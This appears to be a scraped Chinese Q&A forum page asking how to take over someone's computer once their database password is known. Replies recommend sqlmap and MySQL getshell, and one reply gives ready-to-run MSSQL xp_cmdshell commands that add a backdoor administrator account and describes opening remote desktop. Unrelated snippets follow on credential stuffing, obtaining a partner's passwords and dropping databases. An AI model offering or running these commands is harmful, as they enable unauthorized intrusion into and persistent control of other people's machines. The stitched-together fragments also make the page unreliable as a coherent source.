知道資料庫賬號密碼,怎麼連線電腦

時間 2021-05-11 20:18:51

1樓:噔噔凱

這個確實涉及到了本地提權問題,可以搜一搜sqlmap工具的使用方法。或者mysql本地getshell

基本上達到的效果是,你連線上他的資料庫之後,執行的cmd指令,是調取他本地使用者的許可權去執行他電腦上的cmd指令。也就達到了連線他電腦的效果!

如果需要圖形化介面操作的話,或者說你想用遠端桌面的方式連線他的電腦:

2樓:拈花把酒

1.是什麼型別的資料庫 mssql,mysql,oracle

2.得到的資料庫使用者是什麼許可權:sa,root,sysdba

如果是mssql並且拿到的是sa的密碼,就相當於把對方電腦的管理員給你了:

遠端連線它的資料庫,然後執行以下SQL語句:

EXEC xp_cmdshell 'net user admin admin /add'

EXEC xp_cmdshell 'net localgroup administrators admin /add'

上面兩句執行完成,對方電腦裡面就多了乙個管理員admin

至於遠端開3389,要echo乙個reg檔案在對方磁碟,然後通過上面的語句執行reg檔案,可開,

具體的可以看一下這位作者講的東西,非常透徹,他那裡還有很多相關資料,可學習。

DNS原理分析及應用_嗶哩嗶哩 (゜-゜)つロ 乾杯~-bilibili

3樓:cms42

理一下提問者意圖,目標同一區域網內有資料庫訪問權,想要提本地shell?

補一張Anti-Hacker Tool Kit的圖:

基於現有的被拖庫的資料庫進行撞庫攻擊,密碼的安全性太弱了,那麼下一代身份識別的特徵會是指紋或虹膜嗎?

生物識別還更暴露隱私,這個比密碼還恐怖。現在,語言識別也是很恐怖的暴露隱私手段,你經常使用微軟和蘋果和谷歌的語音搜尋,他們會把你的聲線,存在資料庫一輩子的。指紋也是,虹膜也是,心跳什麼也是,還有說的使用習慣也是。想一想,收集多年後,有乙個機械人來到了乙個mall商場,他聽到了二萬人同時講話的聲音,每...

你為了知道男朋友的社交賬號密碼嘗試過哪些方法,成功過嗎?

他自己發我了 打遊戲的時候我說我沒有這個英雄 他就把密碼和賬號給我了 讓我用他的號 說他基本上所有號的密碼都是這個 然後就 其實我一開始沒有打算要他的密碼的 賬號密碼?試過搜男朋友的微博賬號,沒有搜到.也沒有去問他要微博賬號,社交平台那麼多,總有你過問不到的地方,不知道乙個和不知道兩個和三個沒啥區別...

怎麼刪除資料庫?

已登出 跑路1 drop 命令格式 drop database 資料庫名 mysql drop database RUNOOB root host mysqladmin u root p drop RUNOOB Enter password 該函式有兩個引數,在執行成功時返回 TRUE,否則返回 F...